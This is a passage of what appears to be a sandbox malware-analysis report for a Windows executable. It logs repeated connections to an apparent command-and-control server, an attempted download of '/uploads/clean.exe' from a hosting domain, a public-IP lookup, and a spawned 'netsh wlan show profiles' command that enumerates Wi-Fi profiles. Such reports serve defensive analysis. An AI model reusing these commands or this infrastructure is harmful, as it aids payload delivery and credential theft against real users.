                                                                    Dec 5, 2024 13:12:57.614973068 CET320894978489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:58.121186972 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:58.386562109 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:58.886466980 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:59.146138906 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:12:59.651788950 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:12:59.911474943 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:00.417253017 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:00.679137945 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:01.182703018 CET4978532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:01.442487955 CET320894978589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:01.948417902 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:02.208043098 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:02.713680029 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:02.973321915 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:03.479146957 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:03.739665985 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:04.244662046 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:04.504252911 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:05.010081053 CET4978632089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:05.269642115 CET320894978689.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:05.775732040 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:06.047285080 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:06.556560993 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:06.816121101 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:07.322060108 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:07.581463099 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:08.087475061 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:08.346847057 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:08.852952957 CET4978732089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:09.112117052 CET320894978789.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:09.618490934 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:09.878040075 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:10.383914948 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:10.643588066 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:11.149339914 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:11.408994913 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:11.914745092 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:12.178544998 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:12.680243015 CET4978832089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:12.940654039 CET320894978889.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:13.445801020 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:13.705352068 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:14.211074114 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:14.470937014 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:14.976553917 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:15.236267090 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:15.742070913 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:16.002013922 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:16.507462978 CET4978932089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:16.767199039 CET320894978989.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:17.273036957 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:17.532412052 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:18.038408041 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:18.297935963 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:18.803925991 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:19.063127041 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:19.569330931 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:19.828665018 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:20.334764957 CET4979032089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:20.594144106 CET320894979089.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:21.100317001 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:21.360001087 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:21.865701914 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:22.125224113 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:22.631083965 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:22.892496109 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:23.396590948 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:23.656234026 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:24.161977053 CET4979132089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:24.421557903 CET320894979189.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:24.927545071 CET4979232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:25.186919928 CET320894979289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:25.692929983 CET4979232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:25.953912020 CET320894979289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:26.458354950 CET4979232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:26.717627048 CET320894979289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:27.223850012 CET4979232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:27.483135939 CET320894979289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:27.989357948 CET4979232089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:28.248495102 CET320894979289.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:28.755037069 CET4979332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:29.014456034 CET320894979389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:29.520220041 CET4979332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:29.779881001 CET320894979389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:30.285655022 CET4979332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:30.545535088 CET320894979389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:31.051173925 CET4979332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:31.310815096 CET320894979389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:31.816595078 CET4979332089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:32.076611996 CET320894979389.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:32.582169056 CET4979432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:32.841578960 CET320894979489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:33.347503901 CET4979432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:33.607146025 CET320894979489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:34.113040924 CET4979432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:34.372587919 CET320894979489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:34.878412008 CET4979432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:35.137696981 CET320894979489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:35.643843889 CET4979432089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:35.903440952 CET320894979489.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:36.409437895 CET4979532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:36.671391010 CET320894979589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:37.174771070 CET4979532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:37.434092045 CET320894979589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:37.940207958 CET4979532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:38.199435949 CET320894979589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:38.705710888 CET4979532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:38.965111971 CET320894979589.23.100.233192.168.11.20
                                                                    Dec 5, 2024 13:13:39.472027063 CET4979532089192.168.11.2089.23.100.233
                                                                    Dec 5, 2024 13:13:39.731317997 CET320894979589.23.100.233192.168.11.20

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 5, 2024 13:10:58.274389982 CET6049753192.168.11.201.1.1.1
                                                                    Dec 5, 2024 13:10:58.451927900 CET53604971.1.1.1192.168.11.20
                                                                    Dec 5, 2024 13:11:10.660809994 CET5437453192.168.11.201.1.1.1
                                                                    Dec 5, 2024 13:11:10.785723925 CET53543741.1.1.1192.168.11.20
                                                                    Dec 5, 2024 13:11:11.049704075 CET5460953192.168.11.201.1.1.1
                                                                    Dec 5, 2024 13:11:11.174511909 CET53546091.1.1.1192.168.11.20

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 5, 2024 13:10:58.274389982 CET192.168.11.201.1.1.10x5e00Standard query (0)orange-loris-425181.hostingersite.comA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 13:11:10.660809994 CET192.168.11.201.1.1.10xd57Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 13:11:11.049704075 CET192.168.11.201.1.1.10xc7f6Standard query (0)69.170.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 5, 2024 13:10:58.451927900 CET1.1.1.1192.168.11.200x5e00No error (0)orange-loris-425181.hostingersite.comfree.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 5, 2024 13:10:58.451927900 CET1.1.1.1192.168.11.200x5e00No error (0)free.cdn.hstgr.net84.32.84.100A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 13:11:10.785723925 CET1.1.1.1192.168.11.200xd57No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 13:11:10.785723925 CET1.1.1.1192.168.11.200xd57No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                    Dec 5, 2024 13:11:11.174511909 CET1.1.1.1192.168.11.200xc7f6Name error (3)69.170.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • orange-loris-425181.hostingersite.com
                                                                    • icanhazip.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.11.2049757104.16.185.241807544C:\Users\user\Desktop\iGxCM2I5u9.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 13:11:10.910578966 CET63OUTGET / HTTP/1.1
                                                                    Host: icanhazip.com
                                                                    Connection: Keep-Alive
                                                                    Dec 5, 2024 13:11:11.044116974 CET535INHTTP/1.1 200 OK
                                                                    Date: Thu, 05 Dec 2024 12:11:10 GMT
                                                                    Content-Type: text/plain
                                                                    Content-Length: 13
                                                                    Connection: keep-alive
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET
                                                                    Set-Cookie: __cf_bm=.TqQYcpRodu8XWSwyjFB1X1P9sq9WTaNrmZRl48QPLE-1733400670-1.0.1.1-L6JIdvaWbNNldMEojhZe1aj2D3CLFGQeZKMW4RDTYtCy7Q.CUNtxaW3MhLa9lMFZ3BWAT_mhErtX3ACJdHQjgA; path=/; expires=Thu, 05-Dec-24 12:41:10 GMT; domain=.icanhazip.com; HttpOnly
                                                                    Server: cloudflare
                                                                    CF-RAY: 8ed3eff19b08da97-MIA
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    Data Raw: 38 34 2e 31 37 2e 34 30 2e 31 31 30 0a
                                                                    Data Ascii: 84.17.40.110


                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.11.204975684.32.84.1004437544C:\Users\user\Desktop\iGxCM2I5u9.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-05 12:10:58 UTC104OUTGET /uploads/clean.exe HTTP/1.1
                                                                    Host: orange-loris-425181.hostingersite.com
                                                                    Connection: Keep-Alive
                                                                    2024-12-05 12:10:59 UTC392INHTTP/1.1 404 Not Found
                                                                    Date: Thu, 05 Dec 2024 12:10:59 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    last-modified: Wed, 11 Jan 2023 12:29:40 GMT
                                                                    etag: W/"999-63beabb4-5b41a25ab194c3b4;gz"
                                                                    platform: hostinger
                                                                    panel: hpanel
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    Server: hcdn
                                                                    x-hcdn-request-id: 209b163506b912c3746eb8f46d41577b-asc-edge5
                                                                    2024-12-05 12:10:59 UTC977INData Raw: 39 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e
                                                                    Data Ascii: 999<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/n
                                                                    2024-12-05 12:10:59 UTC1369INData Raw: 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 6d 65 64 69 61 3d 22 61 6c 6c
                                                                    Data Ascii: nt="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all
                                                                    2024-12-05 12:10:59 UTC123INData Raw: 20 6e 6f 74 20 61 20 66 61 75 6c 74 2c 20 6a 75 73 74 20 61 6e 20 61 63 63 69 64 65 6e 74 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: not a fault, just an accident that was not intentional.</p> </div> </div></body></html>0


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:07:10:57
                                                                    Start date:05/12/2024
                                                                    Path:C:\Users\user\Desktop\iGxCM2I5u9.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\Desktop\iGxCM2I5u9.exe"
                                                                    Imagebase:0x1605ce50000
                                                                    File size:288'768 bytes
                                                                    MD5 hash:8C6FB38B219A123B9340465B8D2DD5F8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:2
                                                                    Start time:07:10:58
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                                                    Imagebase:0x7ff687340000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:07:10:59
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7d62b0000
                                                                    File size:875'008 bytes
                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:07:10:59
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\chcp.com
                                                                    Wow64 process (32bit):false
                                                                    Commandline:chcp 65001
                                                                    Imagebase:0x7ff77acb0000
                                                                    File size:14'848 bytes
                                                                    MD5 hash:CA9A549C17932F9CAA154B5528EBD8D4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:07:10:59
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\netsh.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:netsh wlan show profiles
                                                                    Imagebase:0x7ff6c7630000
                                                                    File size:96'768 bytes
                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:07:10:59
                                                                    Start date:05/12/2024
                                                                    Path:C:\Windows\System32\findstr.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:findstr All
                                                                    Imagebase:0x7ff7358d0000
                                                                    File size:36'352 bytes
                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Executed Functions

                                                                      Function 00007FFBC7C5B35C Relevance: .5, Instructions: 513COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96ede5883b34af7e59f8bf81faf397daf6fb91b2cbf42c4a308621267699b4e5
                                                                      • Instruction ID: d2cb313c2a096a2393177ce058e285e4a5a3549b7aa27a2823f6dd037c2cdde9
                                                                      • Opcode Fuzzy Hash: 96ede5883b34af7e59f8bf81faf397daf6fb91b2cbf42c4a308621267699b4e5
                                                                      • Instruction Fuzzy Hash: 48024C70918A4E8FEBA8DF28D8457FA77D1FF64310F50423AE80EC7691CB35A9459B81
                                                                      Function 00007FFBC7C5C10C Relevance: .5, Instructions: 490COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 012cf2f6ee2153cb2ff1a88ba921ca256cd9092f8ed00f8d17c285dfb0327539
                                                                      • Instruction ID: 0a3d57ea30afdaecbf1f5cb0992372309202aa933b0cd952b81878c268767cd9
                                                                      • Opcode Fuzzy Hash: 012cf2f6ee2153cb2ff1a88ba921ca256cd9092f8ed00f8d17c285dfb0327539
                                                                      • Instruction Fuzzy Hash: 9CF16C70918A4E8FEBA8DF28D8557FA37D1FB54310F50423AD80EC7691CE79A9849B81
                                                                      Function 00007FFBC7C6F088 Relevance: 2.9, Strings: 2, Instructions: 358COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: &$
                                                                      • API String ID: 0-3672554430
                                                                      • Opcode ID: a38ad1179ef8d8092ea4e803a8055e177393b490100c4d3e47d049b289066e3e
                                                                      • Instruction ID: 4ed6c3aef346adf54515ef6aa3e39d059706dfe9576a1f0873732ab783a54e7c
                                                                      • Opcode Fuzzy Hash: a38ad1179ef8d8092ea4e803a8055e177393b490100c4d3e47d049b289066e3e
                                                                      • Instruction Fuzzy Hash: 434136B1A1D3868FE705DF34C89656B7FE0EF96310F2440BED149CB293DA259806C711
                                                                      Function 00007FFBC7C55D68 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;L_^$SL_^
                                                                      • API String ID: 0-259380329
                                                                      • Opcode ID: 63a3e6838b55ec628570797c9d48da8921e18beec1a492c408b1f27e24212867
                                                                      • Instruction ID: ba5cdf74a7b8c5e96b9841c4d7c2bb4091fe553289ed548f59732812b6340f12
                                                                      • Opcode Fuzzy Hash: 63a3e6838b55ec628570797c9d48da8921e18beec1a492c408b1f27e24212867
                                                                      • Instruction Fuzzy Hash: 9341C1B1A19A1B4FE395ABB8D85A2BB37C3EF45310B6404BDD10EC76D2DD2DAC029251
                                                                      Function 00007FFBC7C55510 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0[#
                                                                      • API String ID: 0-1820536930
                                                                      • Opcode ID: d95cbb67b16041ba7cf46d5252e386b3c8399505294be037a083924c6945b980
                                                                      • Instruction ID: 234e0c661ee9c7a2211185ae5211a3742d3ea9f03d3e2028be44c6f24f3d5534
                                                                      • Opcode Fuzzy Hash: d95cbb67b16041ba7cf46d5252e386b3c8399505294be037a083924c6945b980
                                                                      • Instruction Fuzzy Hash: 17819371A18A5E4FDB98EF2CD4556AA73E2FF98310B1045BAD40EC3286CE34EC428790
                                                                      Function 00007FFBC7C55EAE Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;L_^
                                                                      • API String ID: 0-130345473
                                                                      • Opcode ID: 60636e848d1f84dc5776b6ca19cd3f851e09e81c0d2fa24b66825075356c2f63
                                                                      • Instruction ID: 4aed056dac333f2457024dc07231fc7fc5101c9f1ed8dade693239155022641a
                                                                      • Opcode Fuzzy Hash: 60636e848d1f84dc5776b6ca19cd3f851e09e81c0d2fa24b66825075356c2f63
                                                                      • Instruction Fuzzy Hash: 61213DB0F1895B4BEBC5BBB8D41A2BF23D2EF48210BA40579E10ED3692DD29A8019651
                                                                      Function 00007FFBC7C55E51 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ffbc7c50000_iGxCM2I5u9.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ;L_^
                                                                      • API String ID: 0-130345473
                                                                      • Opcode ID: 161910e75e9ff6588cded99ce3104c6a4f9948e79328e0e52ce3352353a1bee1
                                                                      • Instruction ID: 92976d9b06c0604d9787eba268a0b1aba6ef3476d63bf20978efe96b0f8d2beb
                                                                      • Opcode Fuzzy Hash: 161910e75e9ff6588cded99ce3104c6a4f9948e79328e0e52ce3352353a1bee1
                                                                      • Instruction Fuzzy Hash: 70016DA1F18D1B4BE6C5AAB8945A2BB13C3AF49650BA805B5E50DC36D3EC1DAC025251
                                                                      Function 00007FFBC7C555E0 Relevance: .6, Instructions: 623COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.103307326153.00007FFBC7C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBC7C50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
